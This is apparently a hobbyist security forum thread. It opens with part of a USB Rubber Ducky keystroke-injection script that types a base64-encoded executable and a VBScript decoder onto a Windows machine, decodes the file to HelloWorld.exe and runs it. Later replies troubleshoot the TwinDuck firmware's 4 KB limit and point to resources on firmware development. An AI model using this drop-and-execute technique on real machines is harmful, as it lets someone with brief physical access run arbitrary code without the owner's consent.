STRING AQDG8gEA1PIBAOLyAQAAAAAA8PIBAAAAAAAO8wEAAAAAAEtFUk5FTDMyLkRMTABNU1ZDUDEwMEQu
STRING ZGxsAE1TVkNSMTAwRC5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAFZpcnR1YWxQ
STRING cm90ZWN0AABWaXJ0dWFsQWxsb2MAAFZpcnR1YWxGcmVlAAAARXhpdFByb2Nlc3MAAAA/Z29vZEBp
STRING b3NfYmFzZUBzdGRAQFFCRV9OWFoAAABleGl0AAAAAADgAQAMAAAAojEAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
CTRL Z
ENTER
REM DECODE THE BASE 64 ENCODED TEXT USING A VB SCRIPT
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = 
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = 
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function 
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub 
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe
ENTER
REM RUN THE RESULTING EXECUTABLE
STRING HelloWorld.exe
ENTER
Link to comment
Share on other sites

Depends on firmware. The only limits are on TwinDuck firmware, which is limited to 4096 Bytes.

Whats your output? You have a lot of STRINGS, are they replicated correctly? might have to insert some small delays (eg DELAY 20), just to give the HID messages a small rest, so the computer can catch up?

Edited by midnitesnake
Link to comment
Share on other sites

I am running twin duck firmware. The only output is 5 or 6 red LED flashes.

The script file is 18 KB, and 4096 bytes is 4 KB. The inject.bin is 32 KB. It appears the size is the problem. Is the size limit on the script file or the inject.bin file?

Edited by overwraith
Link to comment
Share on other sites

The limit is only on the Twinduck firmware, as it has to load the inject.bin into memory.

So its the inject.bin that has the limit.

Until someone can figure out the memory internals and manipulate them, we're stuck with the 4KB limit. Otherwise use the other HID-only firmwares that have no-limit, as the payload as read directly from the inject.bin file.

Link to comment
Share on other sites

Is it possible, with the firmware, to read from a compressed file and expand it into memory?

Thinking of which, how would one start developing firmware?

Link to comment
Share on other sites

Until someone can figure out the memory internals and manipulate them, we're stuck with the 4KB limit. Otherwise use the other HID-only firmwares that have no-limit, as the payload is read directly from the inject.bin file.

If the inject.bin was compressed, it would have to be expanded in memory, where the 4096Byte limit exists.

How to get into firmware development - read : http://forums.hak5.org/index.php?/topic/28627-info-how-i-wrote-the-community-edition-firmware/

Also don't use Atmel Studio 6.1 - major changes it breaks the current code (as I found out yesterday), highlights the importance of backing up your code.

Current firmware uses version 5 or 6 of Atmel Studio.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...